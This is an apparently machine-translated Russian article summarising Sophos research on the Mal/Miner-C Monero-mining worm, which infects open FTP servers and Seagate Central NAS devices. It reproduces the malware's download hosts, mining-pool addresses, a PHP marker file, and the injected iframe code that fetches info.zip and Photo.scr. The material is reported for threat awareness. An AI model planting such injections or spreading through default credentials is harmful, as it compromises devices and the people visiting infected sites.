С появлением Биткойна скрытая установка криптомайнеров на чужие ПК стала отличным бизнесом.
Но оно быстро снизилось по мере увеличения сложности майнинга.
Примерно с 2013 года майнинг на CPU и даже на GPU стал почти бесполезное занятие , все перешли на ASIC. 
Увеличение сложности майнинга биткойнов с июня 2013 года по сентябрь 2016 года.
расписание КоинДеск Казалось бы, злоумышленникам пора отказаться от вредоносного ПО с криптомайнерами и перейти на программы-вымогатели.
Многие так и сделали.
Но затем на сцену вышли новые криптовалюты, и старая бизнес-модель снова стала эффективной.
Специалисты антивирусной компании Sophos Labs они говорят о новом криптомайнере, заражающем сетевые устройства хранения данных (NAS), подключенные к Интернету.
Вредоносная программа специализируется на майнинге относительно новой криптовалюты.
Монеро (XMR).
Это не единственная новая валюта с низкой сложностью, но злоумышленники почему-то выбрали именно ее.
Как видно на графике Сложность майнинга Monero с течением времени оставалась довольно стабильной.
Он резко увеличился только в сентябре, после публикации отчета Sophos об обнаруженном вредоносном ПО.
О Monero узнало больше пользователей, поэтому его популярность несколько возросла (редактирование: увеличение сложности и повышение цены Monero могло быть вызвано другие причины ).
Но пока криптомайнер распределялся по сетевым накопителям Seagate, сложность майнинга оставалась примерно на том же уровне.
Рост сложности майнинга Monero с июня 2016 г.
по сентябрь 2016 г.
, расписание МонетаWarz
Мал/Шахтер-C
Специалисты антивирусной компании утверждают, что вредоносная программа Mal/Miner-C постоянно поддерживается и по-прежнему активна.Его авторы последовательно выпускают новые версии, но все эти версии сделаны с использованием системы создания установочных программ.
Система установки Nullsoft со сценариями (НСИС).
В установочный комплект входит несколько версий майнера для CPU и GPU, а также для 32-битной и 64-битной версии Windows. 
Вредоносная программа проверяет версию системы и добавляет в автозапуск соответствующий исполняемый файл.
Последние версии сценария NSIS загружаются со следующих хостов:
- Stafftest.ru
- hrtests.ru
- profetest.ru
- testpsy.ru
- pstests.ru
- qptest.ru
- prtests.ru
- jobtests.ru
- iqtesti.ru
Кошельки, на которые майнинг-пул перечисляет вознаграждения, также известны.stratum+ tcp://mine.moneropool.com:3333 stratum+ tcp://xmr.hashinvest.net:1111 stratum+ tcp://monero.crypto-pool.fr:3333 stratum+ tcp://mine.cryptoescrow.eu:3333
Этот крипто-троян интересен тем, что пытается распространяться как червь.
Заразив одну систему, он пытается скопировать себя через FTP на случайно сгенерированные IP-адреса со стандартными именами пользователей и паролями.
Попадая на FTP-сервер, червь модифицирует файлы с расширениями .
htm и .
php, вставляя фреймы, из которых предлагается скачать файлы.
Фото.
scr И info.zip .
При открытии веб-страницы перед пользователем появляется диалог «Сохранить как.
».
Заражение сетевых дисков Seagate NAS
При поиске систем, зараженных вредоносным ПО Mal/Miner-C, исследователи обнаружили нечто необычное.Они обнаружили, что многие системы были заражены файлом под названием w0000000t.php .
В файле есть строка <Эphp echo base64_decode("bm9wZW5vcGVub3Bl"); ?>
В случае успешного заражения системы запрос к этому файлу возвращает следующий ответ: nopenopenope
Зная о скомпрометированном устройстве, позже туда был установлен фрейм с Mal/Miner-C: <Эphp echo base64_decode("bm9wZW5vcGVub3Bl"); ?>
<iframe src= ftp://ftp:[email protected]//info.zip width=1 height=1
frameborder=0>
</iframe>
<iframe src=Photo.scr width=1 height=1 frameborder=0>
</iframe>
За первые шесть месяцев 2016 года антивирусной компании удалось выявить 1 702 476 зараженных устройств на 3 150 IP-адресах.
Как оказалось, среди различных сетевых устройств хранения данных (NAS) больше всего пострадал Seagate Central NAS. 
Это сетевое хранилище имеет частные (закрытые) и общие папки.
Интересно, что по умолчанию файлы записываются в открытую папку, а аккаунт нельзя удалить или деактивировать.
Из учетной записи администратора вы можете активировать удаленный доступ к устройству, после чего все учетные записи, включая анонимный доступ, станут доступны для удаленного доступа.
Это то, что злоумышленники используют для записи своих файлов в сетевое хранилище.
Фото.
scr И info.zip .
Избавиться от этой угрозы можно, отключив удаленный доступ к устройству, но тогда пользователь потеряет возможность потоковой передачи контента через Интернет и другие полезные функции сетевого хранилища.
Зная кошельки злоумышленников, специалисты антивирусной компании изучили историю транзакций.
Например, вот скриншот суммы выплаты на один из их кошельков: 4912,4 XMR. 
По данным Sophos, майнинг-пул выплатил ребятам в общей сложности 58 577 XMR (вероятно, из России).
На момент расчета обменный курс XMR к евро составлял 1,3 евро за 1 XMR, то есть они заработали примерно 76 599 евро и до сих пор зарабатывают примерно 428 евро в день .
Неплохо для российских студентов, если стипендии не хватает на жизнь.
Криптовалюта Monero от злоумышленников особо не страдает: зараженные машины генерируют всего 2,5% от общего хешрейта.
Чтобы оценить распространенность вредоносного ПО, эксперты изучили состояние FTP-серверов в Интернете.
Да, поисковик Перепись предоставляет 2 137 571 открытый FTP-сервер, из которых 207 110 разрешают анонимный удаленный доступ, а 7 263 позволяют осуществлять запись.
Итак, 5137 из этих 7263 серверов были заражены Mal/Miner-C, то есть около 70% всех записываемых FTP-серверов.
Если вы думаете, что вы и ваш скромный NAS не представляете интереса для преступного мира, есть веская причина подумать еще раз.
Теги: #Криптовалюты #nas #monero #XMR #Seagate Central
-
Микоплазма
19 Oct, 24 -
Гонское Обобщение
19 Oct, 24 -
Укажите Это. Отчет Яндекса
19 Oct, 24 -
Вышла Вторая Бета-Версия Ubuntu 12.04.
19 Oct, 24 -
Наши Люди За Границей Теперь Тоже Форум...
19 Oct, 24 -
Amd Puma Преследует Intel Centrino
19 Oct, 24
